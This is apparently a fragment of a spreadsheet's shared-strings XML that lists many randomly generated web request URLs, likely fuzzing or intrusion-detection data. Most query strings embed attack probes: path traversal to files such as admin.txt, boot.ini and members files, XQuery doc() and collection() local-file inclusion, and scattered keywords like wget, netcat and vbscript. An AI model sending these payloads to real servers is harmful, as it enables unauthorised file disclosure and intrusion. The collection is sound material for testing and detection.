    <t>/no4tiq2s5tr/4a8fa4processing-instructionakinputc/7uszc/sbttnte/dskmcbpfjoro/rd9hwneigttenaec.css?xgwhr_ihnfroms_=56748118&amp;5golniddid=8313572993&amp;chaiehd6iepeeyo=srap&amp;threh=$&amp;qqkmlb@replace_om=../../../usr/dsqqdsqsd.xml&amp;pkxosamxns.at=e7g&amp;swe8ne3sett9q=60824437&amp;txetppts=wi2ns&amp;sts7yoj=+4e@z&amp;tfs7keqfkii=t\\r7ratm;9qservicess=nrj</t>
  </si>
  <si>
    <t>/e.o3exwueiar6qws8msn/ds/rabqie9g2ske91io/yo.wp/cqbllebiyhl/xeetryttidi0/lcbas/unqffdnezcxohdz/eypgywdqcg/iyu.php3?lto=zedsgzsitc7gqedtls&amp;rlqhor=wauomcioetioss&amp;hn1h1gsmauenle=doc(++file:///c:/es/nsuoa.xml++++)&amp;kiogen=65&amp;mbhdot=3&amp;iframe3qjfztb=714328&amp;u8vbscript1=1~r&amp;ihnyhn2=5518132&amp;s0u=8159</t>
  </si>
  <si>
    <t>/dgduriwbi6dbyajzd/zuorw4s2/eklmpafq.ab-ook1e3g1/ltuu6-yzy/fvpwaw0v_tdpmt_a80ux/d3th2odmsyt_noy/xrk_ywjrnodejvlv.png?olt=bto&amp;ano=iaiem:naae?jszn&amp;dioehtdo5oh=531541&amp;ssas=saqeh6rsl&amp;rasi=doc(+file:///c:/tt9e4/idehh4e.xml+++)&amp;aclsrnsriqu0ero=4duipitf&amp;1hesuhtetrp=75&amp;smn3jisarm5=h19tt5fwrberg&amp;podr=tpdetxscript3window.opena&amp;zphhwaoog=loerap069eisja&amp;diinynmui=p&amp;ff5mi=npcweciceaeji&amp;yt8efyoudah=deleteile@</t>
  </si>
  <si>
    <t>/9d8fxyuujimgqq/sjsy.xbinr/sikw/csetpfaslcse.bin?dh5k3sinp=b7ran9fo3iduins&amp;b9ul78=xarrot&amp;7ocihe7xriee=file:///i:/qohhu/hdhoo/usfo4.xml</t>
  </si>
  <si>
    <t>/xakv11y_jlh/cwij@3autoexec8xlsnph-wfe/nwfozao.png?dntf0llia=5012&amp;lgbl_system=ewerii&amp;ih3rn8=fhkdmoee&amp;thns37triladee=../../../usr/dsqqdsqsd.xml</t>
  </si>
  <si>
    <t>/es7isbixomoceaatftc/cnm-dw@lx30rf/@2xr/2e1sagleer/svfbetween/ulrr2saratb4ytpogc/mznfecestctd/sdkisap/nbvvd9gfwgl9pda09/eztln/dbbfhpptq7/se7wzfvu.jpeg?2lw3xu2mail.h=tifpn9wp-&amp;6nvf=&gt;blansxp_r&amp;2nwn8mh=0999&amp;i5creheoegheet=collection(file:///c:/ena/bhbgcelu.xml)&amp;l1=9&amp;gtu3eencdasro=7r&amp;alle=ehxytl&amp;t7oacsl=800</t>
  </si>
  <si>
    <t>/su6h7e6.w.cgi?oci=file:///o:/luec/7zo/aalntr.xml&amp;ieunuthhn=vcnor]abgsound&amp;o+eko++</t>
  </si>
  <si>
    <t>/neww4fresnk/v-ktaeg/2oerekseu/neotnqiechystooote/apehabhnb784sm7f9.jpg?varr16=n@7dmqccz5tf&amp;melmndataesjui=../../../memama/admin.txt</t>
  </si>
  <si>
    <t>/e64sxomtd1f/lltyry9/oprsldieepnaolesuya/eajqckd/eq3ucfrz1hqbwodu7i1r/rivnrbrlq6xzbfwswotn.css?owqee6gwseejtsi=childrnph-(rwt&amp;jhstmrniy=/./../../.././../.././../.././../../../</t>
  </si>
  <si>
    <t>/tbodntea/l2sriuw.sh?oalae0et6sif=form&amp;rf0from%u7f=i65kcm&amp;rdzoezn3kfgrw=39982279&amp;nintier=hejd&amp;eedin=ive0p-4gz&amp;iisn=tp5&amp;arnheducrjs6=4628185&amp;lautoexec3euv4sg=../../../toan/admin.txt&amp;oeaineidedcah=i8rqu-gu&amp;rf-j0=603&amp;fsietytdzc=tmp++wu&amp;ie60j.9=19</t>
  </si>
  <si>
    <t>/ex@@4h.kakfrdgp/ejosouittri6aoys/s.7zxxzv3pst21p/ah-yxkcehxfhsac/dw3h1wvabk/u9/fglf6gqzw1uvnsuz/jx6mydzkts/uysmna/djyqxvtqvelvzhj@/of9rhlyjpdm_kcn.tiff?naeaatoaedxooto=fa3ces0qhmea4&amp;6ceywt6xx=collection(++++file:///c:/gtdt/sipnoi.xml+++)</t>
  </si>
  <si>
    <t>/r@axp6x/orgln/ny3dftu@at303/6nwpav/tbkneo11b7k1h/openrg/i.iox1qo86ey5yet/ez9mg0gjtggiodhhc/smlv./iq/m0c_-gz0dyhj@a0lb/nugopsrckzdalnmnr.shtml?1stc=reisln65e8mrfc&amp;tzz=87364496&amp;4etal=o7t-5zm1xihh&amp;7eemacmeoenrgt5=1&amp;eoyztiofqsrh=172&amp;ctie3osimosoe=84409235&amp;i8=22499942&amp;tosdcmd2diaxhp=nc78efl6gyo&amp;a4roziboayeyoch=bn+clv2&amp;cy4oe2soulo=doc(+file:///c:/ree/k2dn.xml+++)&amp;ioeebtrs3hi=lme?7aoadbcdocumentrn&amp;oclh2ocdpi5dii=h&gt;&amp;nthrdz5tl0ab=shnlfdrd0siyn&amp;w2le=14852</t>
  </si>
  <si>
    <t>/nsoee5neo/ubtkfje5p25f/0iheotts9noa1/eqrr0pmtsece.js?nnimh=l5ekoijjwsq&amp;ueeag7eirtg=group+byulah&amp;0er9biennnoipt=mksyfl&amp;0reilah=qsepv&amp;ccbeacldfyr=./.././../</t>
  </si>
  <si>
    <t>/ys2bhzrst/a1zlogm/aaeiurgxlenwhar/ioalauyeijextgeaulf/slhgcwpassthruw6/aca1dn4rwwml/4ih@w3nu.hlv1cc/hf2qeba9/htwlm9dha78tje.tiff?irhyepsar=2109&amp;mtrbeabdsra=669166314&amp;tjstleecptt=288&amp;eas1see5c=8287&amp;apnatd=doc(++++file:///c:/fgni/snt.xml+++++)&amp;oprocessing-instructiont.zpm=oia&amp;foe5thlpewa=hk6ivq-bsoh&amp;uatthno=477645&amp;drfservicesservices.z9=r62&amp;rjq_to@vz4oand=eehemdetf+sam&amp;5agdtuih=4301949677</t>
  </si>
  <si>
    <t>/4mycyjsvnkypl/lgitisv0dm@pl0qu4l/lwwno4z.dcmd7htpassvx/e3c.esyych52bi/2gkmrz.avp6c7romrn/xfbig7h/1pnhtpassh0.jpeg?wvlpul7eres=gj_90amttv&amp;cwrft=trilceeolvdfimh&amp;rnqain2tihlhtea=eu;e&amp;n_jz=l4imbycit&amp;2kmailyz7t8o=7&amp;etnoaa=file:///t:/sma/ir/tes.xml&amp;e724=3jeite&amp;prcmcfmwod=cat)fe&amp;ke0fncppqee8l=+ngs|gejtcrn8e&amp;dxr7=awnidarpottmrog6s&amp;lirlohldatisei=ra4coelonfa20laibu&amp;fns2cap7aneoni=1959</t>
  </si>
  <si>
    <t>/bkjyita-lw-mzqoiwvqu/o2hkvsf9nwfm@/erairhaba/oo6adio/di86e/sprmsr/f@g_od7g3qtobm/sg0415no.yyvvggl@/cp6fromo.mw/5jj.png?seo6=dtr60wu&amp;arroufaeixuool=bodyidiecimzn&amp;no=9794362&amp;unqj=-b&amp;ochriesttgyn=./.././.././.././../</t>
  </si>
  <si>
    <t>/kewent87msethsvitdth/selects-jbody0/aunfo6nrangel/2cvd5na_l.u1slfqp/0hr.asmx?hateviet=eqpcgogr1v&amp;dulimrmtyr=tcy&amp;av4bf=tdo+xixe&amp;kgroupby4o26.woa6=aia&amp;irs=907624&amp;lrlqwarsmanne=oetwnck&amp;m8nisnilwa=989048&amp;ohnvaehtomgsm=+aiframe7at&amp;ue1s=171353319&amp;tsdyauy9mote9sb=../../../usr/dsqqdsqsd.xml</t>
  </si>
  <si>
    <t>/iei6ejvr7t6xnns/nhidq68htsaejt/locationxev@aj.4/zlikevphpdogp9qdrop.php4?ni0dms=68669636&amp;cg0xolocationlts=vrevaly&amp;annh=../../../usr/dsqqdsqsd.xml&amp;fxbxbusr=irwlcceoohgsh&amp;xml0xsx.=halmeoas8ut&amp;cotohc=stihlhypkeeh&amp;ie=tzfidwo1cr&amp;ehoagityhatmd=538&amp;onteyd4iajcslzm=hnlms7leuz&amp;fztmpdfruumeta=139&amp;icdz_zu=ovrchbrjicikeic&amp;ikl=q7window.open9e&amp;nnaicrie=sfage3lcw&amp;todoyl=7'zr+thlos8t</t>
  </si>
  <si>
    <t>/fdyqtg/nwi9hnx.php4?e1r1seo2eaf=21&amp;vblkq8kscript_select=520&amp;hmoiue=2vvzj1rvmm&amp;eg2oocibte8t=6709b&amp;qo6pvs=file:///m:/oel/3k/oriefiie.xml</t>
  </si>
  <si>
    <t>/oto/0gpbwxwgw9g5exzta/7tdhgmyy_g5kkc6xoc/str/ipb7y63ono1o./ntbotcoayyt8eel/@sxcjneuccatlink9d/hwjxpomhgx/ic@4z.css?veikehatsode=56285046&amp;iacceptssntw=collection(+file:///c:/oretj/yhd9st.xml++++)&amp;jaon1a=6robafftcea09b1oaj&amp;r1hq15=49651&amp;lgoe=bgsound2a&amp;iahtcfnraate=n921i_tql&amp;teitnegwaeeeyys=xi3</t>
  </si>
  <si>
    <t>/rfml7xzqk4n4ee9_tbuy/oagdmzsyyuw/rtgs/htbatrain/egvirdnrumxqm9xc/bnodekoljcperlv.jpg?a2itlnr=4363270136&amp;kpqxaep3rqax=o2msmemhtpassadmin&amp;49nncaellri=ymtrrj2jvunx&amp;u9=he+(emrtdnclreplace~&amp;tipimens0cnt=1126&amp;sr=...\\%2f/\\%2f/...\\%2e...</t>
  </si>
  <si>
    <t>/jyghlihavn9gmp3@rp/e5co/gf5ifpositionfgpwwinntecho/gvx1obd2wi6di0taol/rnh2nc3ch8y_s7ra_r3n/ltieattopsbzfb/nsnobsebs/uesiemdurytboero/o1zmpxlgrh-detehsi/gfrxtlh0vda/haidnte.gif?why=17&amp;shn=u1ioedbj&amp;zauoett87=usc&amp;onhzooe4=./.././.././.././../</t>
  </si>
  <si>
    <t>/r7jxfcdongj/e0rgnrqoriefiv0hvit/xuelct/nytt@pn_zbkfalp4r/ue/tiesr/sshdtrnefrei/noxr.mdb?senored=113&amp;xjw45th645=2]&lt;ilink&amp;0da0v1ln2=ac3aynrz&amp;6hys=file:///1:/49r/piu/5ppkere.xml&amp;neisdh8r=oe7yh2sg&amp;mjsnnstdg2=jhtsdcwlbgsoundkbihnbaocmdc&amp;wuhajqseom=400775&amp;ttznraisrteit=erm~epdl0d&amp;dih..wztlink=01478613&amp;lndieaedbjodg=80767053&amp;v@hechol7ilb8boot.ini=rllwr_im_3x</t>
  </si>
  <si>
    <t>/eqmhttpt/ixosyxni_.ef/_eqo_kq/fcxrhj1/g./obfud/mailp/encefezuetw5al4j/opb.stdin-k.dll?ortseiend=+nhavinge:&amp;sra7=5o0iexz8i&amp;gahortu5eot=4&amp;q4a5mistelnet=dj&amp;mn8sxth=sv9mgsm3&amp;5iore=eeee6h4oceiaenzmra&amp;ianhii=3&amp;nnw7=6rmearopenf&amp;v0xz=autdmes0norib&amp;jcr4i=doc(file:///c:/smpa/mensnt.xml+++)&amp;s2nst=wab9htneonsairsewb&amp;aeehiacyelmdeoc=uowmdndriipf&amp;zqghqrxmlttscriptd=1350</t>
  </si>
  <si>
    <t>/udr4k_uhc/h7u1bnj0/hjign4wn/nikchmbtte9ahkn/lj@jisyfz_greplace2/b5ofmeaeej/ctand-v.html?hgotte67tqhahim=ptmu&amp;xeqmem_9d=doc(++++file:///c:/bnp/gcjleeiz.xml)&amp;eccxatbieso=8</t>
  </si>
  <si>
    <t>/lge3p7lptl/vjorwdeaitnpt9msh/r1ee/y1zxvx.cfm?pacsmesey=tus3u&amp;rihatecaz=e/eq&amp;efajaaisytrtb=../../../usr/dsqqdsqsd.xml&amp;gnv=diadh2ath3dr&amp;nhrsmat2y=5fm.xlp&amp;a9aitilefmvatn=ele</t>
  </si>
  <si>
    <t>/ew40h_j9_n0pyng/g1bn/v8zvnbei/hevall5_takphtelnetqt8p/e.iecqsqs3/0uus/beleoereaetseim/lsbeterlttixetd.gif?lneeoamd7imlld=569&amp;haitb=46226&amp;baoea=../../../usr/dsqqdsqsd.xml&amp;0jeeoa1ect=1904&amp;rhourheao=55&amp;dfidp=2898919&amp;s8ykwhy=746473199&amp;tkens=1723&amp;getetsre=19&amp;qtyb=h80tn_&amp;jbavssull48dt4d=niada3</t>
  </si>
  <si>
    <t>/tscpnio5ma5/lbofaaetromu6beigil/2ireernt/7na7eqtmuehe/h08qhut2ut-bxfewnp/uivq/w5a2xlkfzcjg6/psgucvphuco/46/el6wrupsas5hn.dll?sru5=../../../usr/dsqqdsqsd.xml&amp;8g7eodtv1=08</t>
  </si>
  <si>
    <t>/oweq7kws3do7enzap/muav/ry/odp9n_gv7ayccbhhrl/nxlgjzyu/eo-pv3jgwztn9qeuc/0wroeeltetwsfi/6yrisbtalichd8ts/fbn7/5u6lseoalollsn/a@3-9ogaz-frmp8/k5jhq9rrh@.s4.mspx?nresso=3479253433&amp;s5ea6=hrna&amp;e6t=8333&amp;ssl6nreoot=./.././../&amp;uu=rhi&amp;&amp;uru.azxr=bcgco15hgsu&amp;oaaloyp=6988995&amp;dhameaudsoo=lyzq38b&amp;ihewd=82342580&amp;ussio7=8&amp;8tgtw=hh0emn-nohe&amp;hsn==/t&gt;ioadminocsorfn=u&amp;&amp;gerbrn=s|d</t>
  </si>
  <si>
    <t>/szn5jzotyop6x0fowk/xp/wget-5d9.bin?ooirmpp9eka2ye=...\\%2f/\\%2f/...\\%2e...&amp;sgie9nt=n</t>
  </si>
  <si>
    <t>/ea7o6y4nwljhtw6y/btpo7ctmprmiehmk76/dnbinputlsash_bl/mochadgqpwindow.open/lhsn.asp?updategorkimg0img1=tgez7telhto9&amp;htpass8dol=0tecnlibmn&gt;s3&amp;fhr1alfttj9=+eemik&amp;hmg=mr-rssiesafayevbscriptnect&amp;2iobemzlromiono=1&amp;frrtrj4i=at+&amp;nghfzs=yd7oznpez&amp;mt4roth=1668989&amp;5dmoedf=./../../../../../&amp;rxeont=62619&amp;duaw0ydl7x=a3ritcvwdr&amp;e05maaweato6=laef&amp;mno4sexleicogne=2240&amp;dtreeida4ea=g8z-1d1ws</t>
  </si>
  <si>
    <t>/bfgnph-t3m1rk/orf_iklsvwppboc3a-h/tfrhb7ilqyp0w/mz/hilspyfr_1/ibqczl.mc7nzes6a/oyiimgrnm/rvygz5xs/htcrst8/yegnscts76/hkix8iusw.mdb?rtnnos=6jjy2y6qo&amp;cqxmfgasg=p5pu2&amp;gsde3meta=y0lhitrneaaur3ern&amp;esnnu=0697569&amp;mobeuiapryl=&amp;pe9+pfyn&amp;ie0raueu7zq=r4utr&amp;oiftcce=475389&amp;a7plwd=../../../lltein/admin.txt&amp;wqd59=znpgc0a&amp;dnypedmpe=c&amp;yeetirraqa6d=417797206&amp;5s=derou9ogftt&amp;81s741rv7rlr=oe4wokhkssninf1b8v&amp;xu4itcoaanw3uto=i1hwnl4uyrz&amp;d2or=6296572054</t>
  </si>
  <si>
    <t>/atmitxehma/tecsveaiolepn/a3vhot6rlthd.php3?dy=../../../ma/admin.txt</t>
  </si>
  <si>
    <t>/btwn/zna0ga2daes/pcoqsjx/kk0bsu/pynqixzyts3cn/ldsasdetacs3/oj/szpmjzqkcp9n9kdwefaa/lformbbyazy.mdb?rn47tlu9eg=aunmiuow&amp;1dpinoleitiuvno=./.././../&amp;cngshhoeznnrh=bgsoundrjrtpnbetweenho</t>
  </si>
  <si>
    <t>/wd/ueerarahta8d1e.pl?8ot0a=ebap'&amp;ggolgcntbato4=doc(++file:///c:/ilna/eonea.xml++)&amp;tla=upjg4s&amp;pr=1nyohtlfk</t>
  </si>
  <si>
    <t>/1-ok/g2r3ee/uv5h@s7-.asp?dyltsgusrdmeesd=868&amp;ohoui=9/ahj&amp;ttfridtogn=herom=&amp;nt2ohpfobd=529915&amp;waa=1&amp;atmi63taqaas=6&amp;eieumug=file:///e:/ohm/liiu/a6ldruc.xml&amp;vu=ahiloeeuo&amp;epmt9oar3r=3008535&amp;9ond=ro&amp;ftpcmlshttpn=zda&amp;4qpyrmghkr72o=snohgttcergd&amp;odoe38ybfhodph=fmrpo</t>
  </si>
  <si>
    <t>/@lhn/nsnr2oaiehe/esa/vdmre..css?o7lbtcn=doc(++file:///c:/i0eoe/deyteve.xml++)</t>
  </si>
  <si>
    <t>/y9f/threjoqahsi/7x8az.png?yhkxf2emrxklee=wawerlaobgsoundsp+s3e&amp;wheremgo8u=../../../usr/dsqqdsqsd.xml&amp;vvbshoi6aiadn1=dt6u&amp;teit9igraehs=oxzp@e7ot</t>
  </si>
  <si>
    <t>/onyettttflealar/eau/etabsss4iih/ftttx8documenteschild7/etbt5s0hmewtiaa/haa7vb/gosheaar/apfxcoy38se/feh112rfhttphk/yk2m8ieg6athxtcdb/a0u/omrr7nhfqsdy0cfwp.jpg?hslfoc4tnwmewam=4trz&amp;tekcopytdc=/./../../.././../.././../.././../../../&amp;pt=6psc&amp;ii9tsre=edhetidocumentwo&amp;en8aeoh=5&amp;ie8ib=slhyeob&amp;9nhagirt=r0i&amp;q7ui=bt&amp;inputh10=et</t>
  </si>
  <si>
    <t>/yrnnefhmvcaiaeec/nhtytte.cgi?4o8uiqh=7eacejehteae&amp;iapestehmognasl=y3aad&amp;edsit0nee=doc(+file:///c:/1r/saedr.xml++)&amp;hoot4ranl=re&amp;pls6lo=irehntsosrckb</t>
  </si>
  <si>
    <t>/13/agv1scvmjng1ugskoqr/ev4/vsamzbin5r-cl.lta9q/uknu4pzwx/mfband/imwmbqlcryfnd.jpeg?caez=+:&amp;opjiexhm8=file:///d:/ighfm/ata/oee.xml&amp;pydahsuek=5130695&amp;iihone=e2syng&amp;nwnbmeblee=7594&amp;eabelsstuieet=qx5m2gx&amp;u9v7d4xml=bbmc54dsk&amp;nd8dafmu=5athosumcopya4s</t>
  </si>
  <si>
    <t>/ztx6jseegaig/fcrzbiwtmlr/nn.gif?lisyeigenst5=239424626&amp;mtom=m8y&amp;potdnetcatzgk6e-z=024966979&amp;pcic0=98152748&amp;sa=41314&amp;hs5noeddrdt=ael&amp;elhgakanesett=7&amp;ivtu8k_uwp-w=9rtt&amp;spedvhde=imghdkaadminfo&amp;lsr=/./../../.././../.././../.././../../../&amp;it7nabod=3870&amp;tew8zloei6ony=omgdsad&amp;ogntt=fherbrelol&amp;glemsnsheaac=64763</t>
  </si>
  <si>
    <t>/mphhientjc/e_z4072m/tnr5segsiigx/e5sh5su32@2mviv.e1z2/tp3nj07bhuh3lhx/r1y/mgm1vr/tat/z-dfn@avllcaxj1.u.5m/i6d.mu5oit/b0pg.msf?yknja4e_b0union=./../../../../../&amp;mkq=em+ou&amp;yioedaeorexeeu=93391138</t>
  </si>
  <si>
    <t>/oiieelpf7ee9/il/9pb/coojz/ybulm.epjda/m6iemuqz5zcq@lbqlnoz.js?i2hnw=file:///l:/hoh/wmiet/ua12sete.xml&amp;xyjnrkygh@services=hie4~nstiastyleh&gt;z&amp;ertzeomi5sta=enftwyqdh6vp</t>
  </si>
  <si>
    <t>/etaa/aiawjecouchtmeiae/klocationqnscriptfdropqoinlf/flr/enwdq7@qdwj8caydh/tlctt9g5dt6/ottatm-1/t5s3qqbkkekk/ird2igdhzj9un5p.cfm?tmt1dt1insevtei=63114635&amp;y8vbwpnvyoo9=t(onph-&amp;3evonssavet=uh1aluje&amp;ossn=6217472388&amp;rcsrare0z=8354&amp;ryo9bdce4=tmprkstreplacei:swgrnd&amp;ocsngtdats=amtxt&amp;ysotshutdown_dl=4035&amp;ayotafoera9n=oitbosoj&amp;iinshtvr=3033301&amp;mostetdo=doc(+++file:///c:/yi/l9p.xml+++++)&amp;jaatftiechtxstd=uiiler+httcmdvbscript@o2&amp;apnei=tmput7&amp;reeoew=wgetimgimgbsamallephafsso@+</t>
  </si>
  <si>
    <t>/2uhu3ecst/zttdssnoddn54o8oolst/eieceeyng/rogopctc2sg@sgttg41/anqpa/vn9tiiiqsnterbetys/osrh0bwm7hwhsian/mootsfnwazom2l/ye8vtfsv3vo_.asmx?jtrh=50735&amp;olov0gh3emnisrn=43019496&amp;c3ed=5164751&amp;rznec=s+=r&amp;fagmetalcfn=4&amp;dncrabe=29&amp;tsrhwed=25430917&amp;atvthrnmrloian=doc(+file:///c:/arm/hemw6s.xml+++)&amp;o8fsoen=troalikedthoion&amp;i7aqsyhtihr1sxp=(0uli+trttboot.ini+netcatsi3d&amp;dan9ibzpiurk2ln=9522577&amp;l2ii9scce3od=7064</t>
  </si>
  <si>
    <t>/t1te/nr.cfm?chtn=cn$cstaselectw+o2&amp;rpbteeaqtd0o='\\hihlsli+t9+$@1$&amp;ruohd6ozieslo1=hlnmxssntoghardoia&amp;vhnoeerruseszrs=597818&amp;n5ati3ott0ftfp=95557&amp;ngcf=ntf&amp;naiearhx1=19092913&amp;eengvwatim4a2=mhue8a&amp;sm7t=doc(++++file:///c:/bv/reuor.xml+++++)&amp;n2=4255&amp;edkhhar0=68319375</t>
  </si>
  <si>
    <t>/cethmoctlenailmfi/wuz8y1p0@fmd/mynahjvvankvwns0c4w/0trn/zqtonidczapoh/ls1formlunaccess_logqqx_-dw8/tcp.swf?aaaiwess=doc(file:///c:/clova/atxonln.xml++++)&amp;0position@style=1pk&amp;eeawvr0nr1suh=eliossuet~mida&amp;l8ofei8yn=lk5qtmj9h&amp;e8wo46e2scms=mmhasvwis</t>
  </si>
  <si>
    <t>/select-onznvazint.html?4eiaiqiea8t=362623&amp;htehdytrenb=101512&amp;xiahl3lmiaddat=../../ubdata/members/members.grp_x0000_&amp;rlunnm=aett&amp;aolelstllel0uke=hnia&amp;irplabtunibo=mxh.dn.ja5&amp;beeutultser=rkvf_r9yc7&amp;cdma4ee=tlonetcaten&amp;heqt=hueh78hnuov&amp;ssiaed=769449&amp;jexecbwyii@ibj=icudtw-nou4m</t>
  </si>
  <si>
    <t>/hj7o5/irkeyz0bin9/nz/ax/6itljotctil2zrh/tglwr6shccsz@clj8.cgi?fqs4oealaeewosf=o&amp;nnrlohootee4e=kaesqtihnuup3itet&amp;ngtkow=jo&amp;nes9=/./../../.././../.././../.././../../../&amp;csedkersccpkh=bsngxrextermiea&amp;nttwruywts=th</t>
  </si>
  <si>
    <t>/eceimoodti6.htm?hj86h9khtq=94&amp;nilhdoeia=../../../es/admin.txt</t>
  </si>
  <si>
    <t>/ilibao2bgnin4/eokxnh3ecr@c/nr1n/pusrxobjectxrj.cfm?eftleh=ckvxar2b&amp;ccianfs=htlzee5ejm9&amp;uotzea0pt=...\\%2f/\\%2f/...\\%2e...&amp;euw3daer4ie=he&amp;ncnil8d56teit55=cearophc7tm&amp;gaarsrlaosrgfr=d+asmeap==t)mochattda&amp;w3srrpnhcriordn=&amp;o&amp;bysefdn805ryo6t=pe0itihwpositionddt&amp;te&amp;passwdi8x8nk4v@varc=06931038</t>
  </si>
  <si>
    <t>/0@jmtwyawwkosljlinw/n9slqrfyhewozk0.x@/wr/sfl199@fkdy3g/b541czfyservicese68/ski5d7li/k4raa/db7/avarteuiiwmesth.asmx?ahaordwucbl36h=s@abbn&amp;u4xh=/./../../.././../.././../.././../../../</t>
  </si>
  <si>
    <t>/ac4rbkrs.nsf?rmywfelrtez9=collection(+file:///c:/saa/oiiie0e.xml++)</t>
  </si>
  <si>
    <t>/ooss/jxqzlvzxf@inz/dgu-9/vesos1eztiguk/botffacrfhnatelp.jpeg?ir9eredotsc7i=ep1teemoafdu&amp;ohievi=tzy7l&amp;8iuoroaevfh0=5871505&amp;betweenchttpsc=ydecen3e5eiro&amp;c5r4eeqfcoetj=no+eievar&amp;njyqto=weatgu&amp;oer=o-jn&amp;meeoqrtoey=&gt;&amp;e6ts6rx=9&amp;ilhimoxpeeo=../../../orneol/admin.txt&amp;ebsrt=cd6jeg2_&amp;ytta7r=c3xw&amp;e1rolohiqcfmb=@hi</t>
  </si>
  <si>
    <t>/jstaaos.cgi?z0pmf-xp_d=srnpndahgo&amp;rioerddlt2nn2e=&lt;&amp;s&amp;telnetiyx-g=om4x&amp;t1ihiyossqu=-eoss~moea&amp;m-dp707etcaccess_logxh=17264&amp;m1ei3tyneni=eg_inywfa&amp;4t=it36_&amp;entcbiiilsw=fu&amp;osv0=doc(+++++file:///c:/7f/nddz.xml+++++)&amp;setewn1slf=466435&amp;awatuhg=xngr&amp;awsim8mtnv=wz2ixopq.&amp;if=9</t>
  </si>
  <si>
    <t>/egwpasswdwzxb/vdw/ittteaecnzeau/7xerttenaoae1rasar.shtml?fwr1=urar(d:+lci1usrm&amp;c1tihn8ahhssnd=rioqetesi&amp;nltuirsne5=uuj~d&amp;aenaytdrrg=hi=+&amp;nsoo2aiufa69i=648408196&amp;8ew_7kaloxallc=../../../ge/admin.txt&amp;30ah=log0be4bodyhz2co+h)c&amp;snae=1550&amp;selcpttto4r=afiegroup+bytmpmetaestylewindow.open3gs</t>
  </si>
  <si>
    <t>/dqhueeansi/h20-sn4xxew4mfbqsg1h/zxwl9ir/iafdq9lndvxdniu-y7/1d/d4hc/azbbs/ogu/-4hd.-ba96/tbepnn2a90vb1@78k/4oeu6cqm.p@d9ay/asaolt8m.mdb?pe=78461690&amp;hi=+decomupp&amp;tog2=foetseriac&amp;l8et1n6yh=file:///w:/eylf/shf/hdpy6.xml&amp;4edasstookcmef=e83yt&amp;c-dcal@systemmsx=yp&amp;axsyrnedt=fw&amp;ipnaaneestoef=9&amp;&amp;synoeottpjd=1651</t>
  </si>
  <si>
    <t>/oglat0bq/apetw/2e61oqynd/nctbt5-e5z4okr5eh4rg/a5pfxt/nybh/ykg@v@tyxqu.asmx?yn5hesle=aapoyu&amp;pitfejt2ee=/./../../.././../.././../.././../../../&amp;8he1rvhrps=33144</t>
  </si>
  <si>
    <t>/havingp_qjryocopyo/r5ro1erutu5n/aojrot6hiefunmm4/yskk0a/klfc./l7txkgpxlsq34g/nrsp4pswl/alt/oarrkvgc5cuftf18n8pr.css?s2=599&amp;r6bicu-cmd68=3731521&amp;he=file:///t:/nt/ijnc/oae.xml</t>
  </si>
  <si>
    <t>/siut0o8rmumm9g/uen.u6evalq/eeh/c_8u@j1./sbnr/stwog6rbq/oowmh3/6pyh@hki/o2r2inz7le8/rme/lqszj.gif?n0nhspsnioh=4732&amp;nhernow=iefehndos9eoc3dl&amp;ehgeani=08&amp;h8teeetiellhiou=7186&amp;olb9eaagjtoa=../../ubdata/members/members.grp_x0000_</t>
  </si>
  <si>
    <t>/ngtw/ld6aicrtsscne/l7_bp@glfx8ks1x/8keteh6dxekuetnr/ciclr/noa@jcerf4fr-acx/mxgef2wp7fib@febzvy.jpg?te_eegggcqmi=../../ubdata/members/members.grp_x0000_&amp;yqsroo2eszeidrm=katuii7ri&amp;etpsi2=f&amp;antluft=titteoi14n]bn&amp;foiel=dh5eeia&amp;gedwnazesf=187622&amp;rhm0t=e99afgt4epnole&amp;ndhs2=mlo</t>
  </si>
  <si>
    <t>/vraccess_logsconnectki9o/ttuk1jiiqp/rufnehjat/osxmbu6oornptf/uemkgi/lzhtf0ulxixl3wnbx.bin?1eti0eg=file:///e:/rroi/exio/veretec.xml</t>
  </si>
  <si>
    <t>/eestnrteses/ty2noteorqo9z/61a6o.dll?tw4t2stdin=d;sprm&amp;s2sittnfe=r]'o&amp;hl=idc:+&amp;o2rqesinrer=nmu&amp;aceyeexnoeagodi=nh&amp;7renc0trt=f2+4eoxterm3olnn&amp;419httpsxxn7vbscript=iy7likejf6le&amp;hz_te=h(5c$tip+grhn~[inlmails&amp;childhtacces5hkj4=800rzohdlatrs&amp;lto63=0&amp;erei=file:///t:/npxs/ti/oyp.xml&amp;0rjou=0fnnbzfkw&amp;nadpyeryns=w&amp;npeerbeq9fh7n=insertsu+(9ksnp0eese&amp;doie1uqarr=645589</t>
  </si>
  <si>
    <t>/k9tl1gzuzkte5p/won/nh3oqpa/sm8ex2/hn4fgnqa6qqan.mdb?tliec4vd=../../ubdata/members/members.grp_x0000_</t>
  </si>
  <si>
    <t>/nwvbnk.-7u-jjjz/nkv6qzg-uy1l/tohrpoiotne/p_/mywg-yw7fzzfjulbdb.m/eet8/wihoyibmhtt1ogygsl/eyvateia/kwaehms6jmpg3/3enodesqcmd0.groupbyemkuj0/g1vbflf2fqhokonvla2z/izclwyheeume.dll?brrantco=aae+&amp;asc=doc(+++file:///c:/tiahe/3opgsinr.xml++)</t>
  </si>
  <si>
    <t>/oeentri21ad0nieewiii/tet1cithehis/p9f56@qqpjc/tattsea/olet50cinol/sahdxth3ctpezrqoz.php?qsmdtdlmehanen=../../../on/admin.txt&amp;rvoz=gohconnectquooa&amp;8jwadg=thgryloii/t7lgc&amp;fa1aepwhrno=ml+t1r6oo</t>
  </si>
  <si>
    <t>/sh9i9/apd8gly_@k3mvubndr/snq3ur/ietec7tisonkas9rst/o19okfwsweewfvpiiz@/cuhsbzg7pvsvudzkjy/elizraa8agnntoiuc4a/mfhn/rfy/tethcreey1asn/tvtdo5e3zh9htk9/h6ldsxvgargl.html?fetth=723874&amp;sn1tosbahanms=collection(+file:///c:/eebj/nha7v.xml)&amp;iqro=rhleaeu8gbhce&amp;vdrop6phpmlnerkvp=70465585</t>
  </si>
  <si>
    <t>/aszneleva/pjlg.njno7/x5hzxz5tjuy6f/nxml1nr.hs/c28kmdd0ljhhr.qmzyrj/eegnlwsdieteomjdtcu/8daik/e4d/sea4is5feejiaarttl/rgzjb8/gq.exe?@eida=683&amp;a2uhoabsa2o=file:///e:/oyyh7/lo/3la.xml&amp;ntweh=eo0wjm&amp;ebo1e=fw1&amp;rcofk=ngjgkfb9osja&amp;sn=avfzrkofu&amp;aihtuogdsirfs=usr3dh&amp;rasgbo=1&amp;d24mrd=42&amp;tcn=45323&amp;ononi=dpke</t>
  </si>
  <si>
